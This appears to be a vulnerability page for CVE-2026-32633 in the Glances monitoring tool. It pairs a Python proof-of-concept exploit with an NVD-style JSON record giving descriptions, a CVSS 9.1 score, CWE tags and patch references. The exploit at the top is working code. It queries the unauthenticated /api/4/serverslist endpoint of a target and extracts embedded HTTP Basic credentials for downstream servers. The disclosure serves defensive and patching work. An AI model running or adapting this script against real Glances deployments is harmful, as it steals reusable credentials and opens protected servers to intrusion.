CVE-2026-32633

import requests import json # CVE-2026-32633 PoC - Unauthenticated credential disclosure # Target: Glances instance running in Browser mode without --password target_url = "http://<target_ip>:61208/api/4/serverslist" def exploit(): # No authentication required - this is the vulnerability response = requests.get(target_url) if response.status_code == 200: servers = response.json() print("[+] Successfully retrieved server list") print("[+] Extracted credentials:") credentials = [] for server in servers: if 'uri' in server: uri = server['uri'] print(f"[*] URI: {uri}") # Extract credentials from URI if '@' in uri: auth_part = uri.split('@')[0].split('://')[1] credentials.append(auth_part) return credentials else: print(f"[-] Request failed with status: {response.status_code}") return [] if __name__ == "__main__": creds = exploit() print(f"\n[+] Found {len(creds)} credential pairs")

{"cve": {"id": "CVE-2026-32633", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:28.933", "lastModified": "2026-03-19T19:04:46.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue."}, {"lang": "es", "value": "Glances es una herramienta de monitoreo de sistema de código abierto multiplataforma. Antes de la versión 4.5.2, en modo Navegador Central, el endpoint `/api/4/serverslist` devuelve objetos de servidor sin procesar de `GlancesServersList.get_servers_list()`. Esos objetos son mutados in situ durante el sondeo en segundo plano y pueden contener un campo `uri` con credenciales HTTP Basic incrustadas para servidores Glances descendentes, utilizando el secreto de autenticación de Glances derivado de pbkdf2 reutilizable. Si la instancia frontal de Navegador/API de Glances se inicia sin `--password`, lo cual es compatible y común para implementaciones de red internas, `/api/4/serverslist` no está completamente autenticado. Cualquier usuario de red que pueda alcanzar la API del Navegador puede recuperar credenciales reutilizables para servidores Glances descendentes protegidos una vez que hayan sido sondeados por la instancia del navegador. La versión 4.5.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-522"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.2", "matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59"}]}]}], "references": [{"url": "https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}